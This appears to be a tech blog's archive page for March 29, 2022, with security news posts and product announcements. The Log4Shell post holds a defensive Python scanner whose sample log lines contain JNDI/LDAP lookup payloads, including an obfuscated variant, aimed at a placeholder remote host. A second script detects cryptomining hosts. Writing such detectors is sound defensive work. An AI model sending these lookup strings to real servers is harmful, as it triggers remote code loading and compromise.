Archive for March 29, 2022

Researchers Uncover A New Malware Loader Called Verblecon 

Posted in Commentary with tags on March 29, 2022 by itnerd

Security researchers at Symantec published a technical report today on a new malware loader tracked as Verblecon, which has escaped detection because its code is polymorphic. In other words, it changes itself to evade a typical antivirus product. The malware has been observed being used in attacks that install cryptocurrency miners on compromised machines.

Chris Olson, CEO of The Media Trust, had this to say:

 “Polymorphic techniques are just another way to hide malicious intentions, along with checks for security tools and live environments. What’s interesting is this attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0. Today’s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos. To prevent that from happening, we must learn from our past mistakes. Today’s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design – otherwise, the same issues will replicate themselves with greater potency than ever.”

Symantec appears to currently protect their users from this threat. But one wonders how long that will be the case. And I honestly don’t want to take any bets on that.

Log4Shell Exploited To Infect VMware Horizon Instances

Posted in Commentary with tags on March 29, 2022 by itnerd

Last year, I wrote about Log4Shell being actively exploited by threat actors to deliver malware and crypto miners. And that trend appears to be continuing as Sophos researchers warned today that Log4Shell is being exploited to infect VMware Horizon servers with backdoors and crypto miners. According to the report, the Log4Shell attacks target unpatched VMware Horizon with three different backdoors and four cryptocurrency miners.

In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers. The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers. SophosLabs has observed these attacks in customer telemetry since the beginning of January.

The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware; others had less clear motives, and may be associated with initial access brokers or ransomware actors. These attacks continue.
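The Sophos passage above describes the lookup string that makes Log4j fetch a remote class over LDAP. As an added example, not code from the Sophos report or from this post, the following Python scans web-server access log lines for that `${jndi:` lookup, normalizing the nested `${lower:...}` and `${x:-y}` forms that defeat a naive substring match. The log lines, hostnames and addresses are constructed; this is a triage aid for defenders reviewing Horizon logs, and the real fix remains patching.

```python
import re

# Constructed sample access-log lines (not from the Sophos report): a benign
# request, a plain JNDI lookup string in the User-Agent field, and a nested
# lookup variant that spells "jndi" through inner ${lower:...} lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [05/Jan/2022:10:01:12 +0000] "GET /portal/webclient/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jan/2022:10:01:40 +0000] "GET /portal/webclient/ HTTP/1.1" 200 4321 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [05/Jan/2022:10:02:03 +0000] "POST /broker/xml HTTP/1.1" 200 17 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
]

# Innermost case-conversion lookups, e.g. ${lower:J} -> j, and the default-value
# form ${undefined:-x} -> x. Log4j resolves both before evaluating the outer lookup.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text, max_rounds=10):
    """Collapse nested lookups from the inside out, as Log4j would, so that
    obfuscated variants reduce to their plain form before matching."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line):
    """True if the line carries a JNDI lookup after normalization."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan_log(lines):
    """Return (1-based line number, line) for each line carrying a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

The normalizer only handles the two nesting forms shown; treat a hit as a reason to check whether the host has already made an outbound LDAP connection and whether it is running a patched Horizon build, not as proof of compromise on its own.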

So in short, you need to patch all the things to protect yourself… But:

Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature. VMware has pushed out patched versions of Horizon as of March 8 2022, but many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. Even if they have, as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.

That’s not good. I have a comment on this from Saryu Nayyar, CEO and Founder of Gurucul:

“Similar to Cobalt Strike, this is an example of an assessment tool being weaponized by threat actors to breach organizations. It is critical to employ self-training machine learning and behavioral models to identify exploitation of the exposed vulnerability as well as detect the remote surveillance done by the attackers. Current XDR and traditional SIEM solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods. Organizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.”

So not only should you patch everything that runs VMware Horizon, but you should also go over your infrastructure with a fine-tooth comb because the bad guys may already be in the door.

LinkedIn Welcomes Members of Paddle HR To Accelerate The Development Of LinkedIn Learning Hub

Posted in Commentary with tags on March 29, 2022 by itnerd

In the era of the Great Reshuffle, retaining employees has arguably never been more important. When employees feel like their skills aren’t being put to use, they are 10x more likely to leave a job, making opportunities for career development and growth at a company that much more critical. 

To further help businesses retain their talent, LinkedIn is announcing that members of the Paddle HR team, including CEO Pat Whelan and CTO Sid Bhargava, will be joining LinkedIn.

The team at Paddle HR have deep domain expertise building internal talent mobility and career development solutions that are AI-driven, and they share a similar vision – to make skills the currency of the talent ecosystem.

By bringing the team onboard, LinkedIn can accelerate the work they’re doing to build career development and internal mobility capability within LinkedIn Learning Hub – a skill-building platform – to empower employees to accelerate their careers and help employers better retain their talent.

You can read the full announcement here.

Procore’s Annual ROI Report Reveals Significant Customer Benefits Surrounding Sustainability, Safety And The Labor Shortage In Construction

Posted in Commentary with tags on March 29, 2022 by itnerd

Procore Technologies, Inc., a leading global provider of construction management software, today released the results of its 2022 Customer Return On Investment (ROI) report. The report explores how the Procore platform is helping customers tackle the most daunting challenges in the industry, including sustainability, safety and the labour shortage, by analyzing responses from 2,600+ customers across North and South America, Asia and Europe. Key takeaways include:

  • Building Scalable Businesses: Customer respondents state that using Procore enables their project teams to manage 48 per cent more construction volume per person, on average.
  • Reduced Rework: 75 per cent of respondents agree Procore has helped reduce the amount of rework.
  • Improved Efficiency: Customer respondents reported saving an average of 15 days on the overall schedule on a typical project.
  • Safer Jobsites: 79 per cent of customer respondents that use Quality and Safety agree Procore has improved their company’s safety programs.

Rising material costs and supply chain issues, labour shortages, slimming margins, continued project delays, increasing carbon emissions due to rework and waste and the need for more sustainable solutions are just a few obstacles the industry is facing and will continue to face in the years to come.

Key takeaways and supporting customer responses can be found below:

Building Scalable Businesses: Customer respondents believe using Procore enables their project teams to manage on average 48 per cent more construction volume per person.

Reduced Rework: 75 per cent of customer respondents agree Procore has helped reduce the amount of rework taking place on their projects which leads to less carbon waste, more efficiency and delivering more projects on-time and on-budget.

Improved Efficiency: Customer respondents reported saving an average of 15 days on the overall schedule on a typical project.

Safer Jobsites: 79 per cent of customer respondents that use Quality and Safety agree Procore has improved their company’s safety program.

Procore’s sole focus is construction. From preconstruction to closeout, the Procore platform is purpose-built and developed to meet the needs of the construction industry. Continually recognized with top honours by leading user review sites such as G2, the Procore platform helps customers produce more value, deliver better project outcomes, and develop stronger, safer, and more productive teams.

To discover the tools that are driving results for construction leaders across the globe, download the Procore 2022 ROI Report today.

Ukraine’s Biggest Telco Hit By “Powerful” Cyberattack

Posted in Commentary with tags on March 29, 2022 by itnerd

The war in Ukraine is clearly shifting to cyberspace as news is filtering out that Ukraine’s biggest telco has been hit by a “Powerful” cyberattack:

Ukraine’s state-owned telecommunications company Ukrtelecom experienced a disruption in internet service on Monday after a “powerful” cyberattack, according to Ukrainian government officials and company representatives.

The incident is the latest hacking attack against Ukrainian internet services since Russian military forces invaded in late February.

“Today, the enemy launched a powerful cyberattack against Ukrtelecom’s IT-infrastructure,” said Yurii Shchyhol, chairman of the State Service of Special Communication and Information Protection of Ukraine. “The attack was repelled. And now Ukrtelecom has an ability to begin restoring its services to the clients.”

“Currently, the attack is repulsed, the provision of services is gradually resumed,” said Ukrtelecom spokesperson Mikhail Shuranov.

Toby Lewis, Darktrace’s Global Head of Threat Analysis provided me with this analysis:

In what is being dubbed ‘World War Wired,’ it is no surprise that Russian cyber-attackers have targeted a major Ukrainian internet provider. Yet, while there has been some disruption to the ISP’s traffic, internet connectivity and cellular networks are largely still operable across the country. This attack has not achieved its desired level of disruption.

A lot of the discussion has focused on Russia’s offensive cyber power, but not enough time has been spent talking about Ukraine’s strong defense. Since the infamous 2015 cyber-attack on the Ukrainian power grid, Ukraine has made significant efforts to build up cyber-defenses, particularly around its critical infrastructure, and ensure resilience in future attacks. This strategy should come as no surprise to global cyber-defenders. Some intelligence even indicates alleged covert operations involving United States military personnel and private-sector engineers throughout 2021 to protect Ukraine against expected cyber-intrusions from Russian-sponsored proxies.

With little information available about the apparent DDoS attack on Ukrtelecom, the provider appears to be prioritizing critical infrastructure and managing disruption through their incident response. Like other Ukrainian organizations facing the threat of Russian cyber-aggression since 2015, it has had no choice but to develop effective cyber-defenses.

The era of the hybrid war is upon us. Which means that we will likely see more of this in Ukraine and beyond in the coming days or weeks. So we all need to be prepared to deal with these attacks when they arrive.

TELUS Health Acquires Sprout Wellness Solutions

Posted in Commentary with tags on March 29, 2022 by itnerd

TELUS Health today announced it has acquired Sprout Wellness Solutions, a holistic digital health and wellness solution designed to educate, engage and inspire people to improve their health through behaviour change. The solution will be available as part of the TELUS Health suite of services for Canadian employers to empower their employees, through their benefits plan, to live healthier lives.

Built using machine learning and cognitive behavioural science, the Sprout platform encourages, measures, and rewards healthy behaviours through:

  • Real-time health risk assessment;
  • Wearable device integrations and activity tracking;
  • Engaging health and wellness content;
  • Dynamic goals, gamified challenges, and more.

As an early investor in Sprout since 2015, TELUS recognized the positive influence the innovative health solution had on overall health and wellness, helping employees to shift their mindset to more proactively focus on improving their overall health and happiness.

As organizations increasingly seek to embrace more digital well-being empowerment tools for their team members, this acquisition allows TELUS Health to deliver a broader suite of options to complement its established services such as virtual care, virtual pharmacy, and medical and mental health clinics to support Canada’s workforce at every step of their health journey.

Sprout will continue to be available for all its current customers. Over the coming months, TELUS Health will integrate Sprout Wellness Solutions into its Virtual Care service, making it available as a value-added solution to clients nationally in English and French.

Employers who are interested in learning more about how Sprout can improve the health and well-being of their employees by being added to their benefits plans can request information here.

Cloud Systems Are The New Battleground For Crypto Mining Threat Actors Says Trend Micro

Posted in Commentary with tags on March 29, 2022 by itnerd

Trend Micro today announced a new report revealing a fierce, hour-by-hour battle for resources among malicious cryptocurrency mining groups.

To read a full copy of the report, A Floating Battleground Navigating the Landscape of Cloud-Based Cryptocurrency Mining, please visit: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/probing-the-activities-of-cloud-based-cryptocurrency-mining-groups

Threat actors are increasingly scanning for and exploiting exposed cloud instances, as well as brute-forcing Secure Shell (SSH) credentials, in order to compromise cloud assets for cryptocurrency mining, the report reveals. Targets are often characterized by outdated software in the cloud environment, poor cloud security hygiene, or inadequate knowledge of how to secure cloud services, and are thus easily exploited by threat actors to gain access to the systems.

Cloud computing investments have surged during the pandemic. But the ease with which new assets can be deployed has also left many cloud instances online for longer than needed—unpatched and misconfigured.

This extra computing workload threatens to slow key user-facing services for victim organizations, and it can increase operating costs by up to 600% for every infected system.

Crypto mining can also be a precursor to more serious compromise. Many mature threat actors deploy mining software to generate additional revenue before online buyers purchase access for ransomware, data theft, and more.

The Trend Micro report details the activity of multiple threat actor groups in this space, including:

  • Outlaw, which compromises IoT devices and Linux cloud servers by exploiting known vulnerabilities or performing brute-force SSH attacks.
  • TeamTNT, which exploits vulnerable software to compromise hosts before stealing credentials for other services to help it move around to new hosts and abuse any misconfigured services.
  • Kinsing, which sets up an XMRig kit for mining Monero and kicks any other miners off a victim system.
  • 8220, which has been observed fighting Kinsing over the same resources. They frequently eject each other from a host and then install their own cryptocurrency miners.
  • Kek Security, which has been associated with IoT malware and running botnet services.

To mitigate the threat from cryptocurrency mining attacks in the cloud, Trend Micro recommends that organizations:

  • Ensure systems are up-to-date and running only the required services
  • Deploy firewall, IDS/IPS, and cloud endpoint security to limit and filter network traffic to and from known bad hosts
  • Eliminate configuration errors via Cloud Security Posture Management tools
  • Monitor traffic to and from cloud instances and filter out domains associated with known mining pools
  • Deploy rules that monitor open ports, changes to DNS routing, and utilization of CPU resources from a cost perspective
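The last three recommendations above (monitor traffic for mining-pool domains, watch open ports, and watch CPU utilization) can be turned into simple detection logic. The following Python is an added example and not part of the Trend Micro report: it runs over constructed host telemetry and flags sustained high CPU, DNS queries to a mining-pool denylist, and listening ports absent from a per-host baseline. The host names, pool domains (placeholders under `.invalid`) and samples are all constructed.

```python
from collections import defaultdict

# Placeholder denylist (constructed); a real deployment loads a curated list of
# mining-pool domains from threat intelligence rather than hard-coding them.
MINING_POOL_DOMAINS = {"pool.example-mining.invalid", "xmr.example-pool.invalid"}

# Constructed baseline of expected listening ports per host.
BASELINE_PORTS = {"web-01": {22, 443}, "build-07": {22}}

# Constructed telemetry samples: (host, sample_no, cpu_pct, dns_queries, listening_ports).
TELEMETRY = [
    ("web-01", 1, 35, ["cdn.example.com"], {22, 443}),
    ("web-01", 2, 40, [], {22, 443}),
    ("web-01", 3, 38, [], {22, 443}),
    ("build-07", 1, 96, ["pool.example-mining.invalid"], {22}),
    ("build-07", 2, 99, [], {22, 4444}),
    ("build-07", 3, 98, ["sub.xmr.example-pool.invalid"], {22, 4444}),
]


def is_mining_pool_query(name):
    """True if the queried name is, or is a subdomain of, a denylisted pool domain."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in MINING_POOL_DOMAINS)


def detect_mining_indicators(telemetry, baseline_ports, cpu_threshold=90, sustained=3):
    """Return {host: [finding, ...]} for hosts showing any of the three indicators.

    A CPU finding fires once when utilization stays at or above the threshold for
    `sustained` consecutive samples; each unexpected port is reported once per host."""
    by_host = defaultdict(list)
    for rec in sorted(telemetry, key=lambda r: (r[0], r[1])):
        by_host[rec[0]].append(rec)

    findings = {}
    for host, recs in by_host.items():
        host_findings = []
        reported_ports = set()
        run = 0  # consecutive samples at or above the CPU threshold
        for _, _, cpu, queries, ports in recs:
            run = run + 1 if cpu >= cpu_threshold else 0
            if run == sustained:
                host_findings.append(f"cpu >= {cpu_threshold}% for {sustained} consecutive samples")
            for q in queries:
                if is_mining_pool_query(q):
                    host_findings.append(f"dns query to mining pool domain {q}")
            unexpected = ports - baseline_ports.get(host, set())
            for port in sorted(unexpected - reported_ports):
                host_findings.append(f"unexpected listening port {port}")
                reported_ports.add(port)
        if host_findings:
            findings[host] = host_findings
    return findings


if __name__ == "__main__":
    for host, items in detect_mining_indicators(TELEMETRY, BASELINE_PORTS).items():
        for item in items:
            print(f"{host}: {item}")
```

Any one indicator alone is noisy (a build host legitimately pegs its CPU), which is why the report pairs CPU monitoring with network and port checks; a host that trips two or three of them at once is the one to pull for investigation.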

Guest Post: Conversation Hijacking Doubles In 2021 Says Atlas VPN

Posted in Commentary with tags on March 29, 2022 by itnerd

Users are frequently aware of plain phishing schemes and do not open any fraudulent links or attachments, especially when they appear out of nowhere and with no context. However, conversation hijacking is an advanced type of phishing attack where fraudsters use already existing conversations to spread malware or extract money from the victims.

These attacks tend to be much more effective because the message comes as part of an ongoing email chain, so it doesn’t look as suspicious as an unexpected email coming out of nowhere and asking for you to pay an invoice or download an attachment to view supposedly important documents.

Even though conversation hijacking attacks are much less common than usual phishing attacks, they still happen thousands of times every month. 

Analysis by Atlas VPN reveals that conversation hijacking attacks more than doubled in 2021, surging from 5,106 in Q1 2021 to 12,606 in Q4 2021, representing a growth of 147% for the period. The data for the analysis on conversation hijacking attacks was provided by Barracuda, a worldwide leader in online security.

Interestingly, the most dramatic increase happened from Q1 2021 to Q2 2021, where the volume of attacks surged by 101% in a quarter. 

The volume of attacks continued to rise throughout the year but at a much slower pace. 

Looking at the volume of attacks from another angle, businesses globally encountered an average of 137 conversation hijacking attacks per day in Q4 2021.

To read the full article, head over to: https://atlasvpn.com/blog/conversation-hijacking-doubles-in-2021

My Thoughts On The Mac Studio Two Weeks After It Was Announced

Posted in Commentary on March 29, 2022 by itnerd

It’s been a couple of weeks or so since Apple announced the Mac Studio. And there’s three recurring themes that seem to be popping up in my inbox and Twitter that I’d like to comment on.

  • If you’re not a professional, you probably shouldn’t buy the Mac Studio: First let’s define professional. I define that as someone who makes a living doing things like editing video or photos. Or perhaps it’s someone who does 3D modelling or rendering. Or someone who runs large mathematical models every day. In other words, it’s someone whose living revolves around the saying “time is money”. If that’s you, then the Mac Studio is for you. At least until the new Mac Pro with Apple Silicon appears. For everybody else, the fact is that if you need an Apple desktop, the M1 iMac or the M1 Mac Mini are both very good computers with a lot of power. So if you’re in that camp, save a few bucks and skip the Mac Studio.
  • Why does Apple have removable drives if they don’t plan on letting you upgrade your Mac Studio: This became an issue of sorts when the first Mac Studio units started appearing, and YouTube channel MaxTech did a teardown and discovered that the Mac Studio had removable storage in the form of two slots, one of which was unused in his case. Then YouTuber Luke Miani did two videos attempting and failing to upgrade the storage on the Mac Studio, which turned into a rant about “right to repair.” The fact is that Apple says that the Mac Studio isn’t upgradable. Unless some above-genius-level IQ type comes up with an upgrade kit that works, or Apple actually offers one the way they do with the Mac Pro, I would take them at their word and assume that upgradability is a bonus if it ever happens and not an expectation. To go further, if you need upgradability, my advice is to wait until the upcoming Apple Silicon Mac Pro and see what that brings to the table. Finally, my thinking is that the non-existent upgradability is not because of some evil Apple plot. I suspect that it’s because of the following reasons:
    • Apple has removable slots for the storage because it likely costs them way less to have one or two motherboard part numbers as opposed to say 10 of them with every storage configuration and processor configuration. Less cost means more profit for Apple.
    • Apple likely needs both slots to facilitate 8TB (or perhaps even 4TB) of storage by using two storage modules and using RAID 0 to stripe them so that they show up as 1 volume. If they don’t need the second slot, it stays empty.
    • Various YouTubers call these storage modules SSDs. I’ve been told by Apple Genius Bar employees that I know that they are not SSDs. They are NAND storage modules which are controlled by the storage controller that is built into the M1 Max or M1 Ultra processor. Without going way into the weeds, these storage modules have no intelligence on them. They’re simply storage. But the use of these specific modules gives the Mac Studio the insanely fast disk read and write speeds that it is capable of. It also means that without a whole lot of gymnastics, upgrades are likely a non-starter, or at the very least they will require the same sort of gymnastics that the Mac Pro upgrade kit requires, because unlike SSDs, these storage modules are likely tied to the logic board in some way. If I had to make a guess, I suspect that Apple did this for security reasons and not to screw their customer base over.
    • Finally, unlike say a 16″ MacBook Pro, the Mac Studio is sitting on a desk and typically not moving. In a portable use case, soldering the storage modules to the logic board eliminates issues due to vibration. Since the Mac Studio isn’t moving, this likely didn’t make sense. Thus it has slots.
  • Apple says that the Mac Studio and the M1 Ultra chip should beat an Nvidia RTX 3090, but it doesn’t: Various websites and YouTubers have run benchmarks on the M1 Ultra-equipped Mac Studio and can’t figure out how Apple was able to make the claims that it did at the event where the Mac Studio was announced. I can see two reasons for that. The first is that Apple is lying. I have to throw this out there as a possibility even though I can’t see it being factual, because that’s a great way for Apple to get a class action lawsuit served up to them that they won’t win. Which brings me to my second reason: the benchmark tests simply don’t push the machine hard enough for you to see the true power of the computer. And that’s the thing about benchmark tests. They’re synthetic, and they are great tools for figuring out how fast a computer is or isn’t, right up until they aren’t. Ditto for applications, which may require updates to fully use the power of the M1 Ultra. And this article supports that, based on looking at this whole issue and going deep into the weeds to explain why people are seeing the benchmark results that they are. So the take-home message is that you should use benchmark results as a guide, but not as an absolute.

So those are my thoughts on the Mac Studio a couple of weeks after it was announced. What are your thoughts? Please post them in the comments and let me know what you think.

Exclusive Networks Announces Partnership With F5

Posted in Commentary with tags on March 29, 2022 by itnerd

Exclusive Networks, a global trusted cybersecurity specialist for digital infrastructure, announced its new partnership with F5, one of the world’s leading multi-cloud application security and delivery companies. The new partnership will extend Exclusive Networks’ reach, through the expertise of Nuaware subsidiary, into the North American market and give regional customers access to F5’s complete portfolio, including BIG-IP, NGINX and the recently announced F5 Distributed Cloud Services.

Together, Exclusive Networks, with Nuaware’s cloud native software expertise, and F5 will infuse the current technical landscape with the innovative solutions needed to advance their customers’ enterprise security. These bundled product offerings not only help keep organizations safe and secure against today’s cyberthreats, but also enable customers to focus more on their core business and goals.

One major factor bringing F5 to Exclusive Networks was the latter company’s late 2020 acquisition of Nuaware, a specialized leading distributor in Containerization, DevOps / DevSecOps, Cloud and Cloud Native Software technologies that, like its parent company, provides customers with the right products, training, and a specialized partner ecosystem. In the end, it’s Nuaware’s expertise and role as Exclusive Networks’ cloud native software center of excellence that creates the perfect alignment for F5 and its portfolio of products.

With an already existing foothold in the EMEA and APAC regions, adding F5’s enterprise solutions and services and respected reputation to its long list of existing partnerships, Exclusive Networks, with Nuaware, will continue to fortify its position as a global cybersecurity leader. Partnerships, like F5’s, enable Exclusive Networks to build best-of-breed solutions for customers from its extensive catalog of vendor products and services.

Exclusive Networks will offer:

  • BIG-IP: A portfolio of cloud, virtualized and physical appliances and services providing enterprises with availability, performance and security. BIG-IP solutions include DNS hyperscale and security (BIG-IP DNS), threat prevention and management (BIG-IP Advanced Firewall Manager), and user access management and security (BIG-IP Access Policy Manager). 
  • F5 Distributed Cloud Services: F5 Distributed Cloud Services provide security, multi-cloud networking, and edge-based computing solutions on a unified software-as-a-service (SaaS) platform. These services are centrally managed but can be deployed anywhere the app needs to be to maximize business impact and deliver a superior customer experience. 
  • NGINX: NGINX provides a lightweight and flexible platform for high-performance app delivery and security services spanning from monoliths to microservices. NGINX products include application delivery and API management (NGINX Controller), load balancing and API gateway (NGINX Plus), DevOps security solutions (NGINX App Protect) and secure service-to-service traffic management (NGINX Service Mesh).

Exclusive Networks’ commitment to F5 will not only benefit customers facing the challenges of multi-cloud deployments and adaptive applications, but will also energize the onboarding of existing and net new Exclusive Networks’ partners, presenting them with new and extended opportunities within the competitive cybersecurity market.

Before its partnership with F5, Exclusive Networks was already a leading cybersecurity distributor and solution provider in an ever-growing global market. Now, with the F5 partnership and its expansion into North America, Exclusive Networks increases its lead as a forward-moving driving force, passing its competitors by providing customers with its best-of-breed bundle solutions.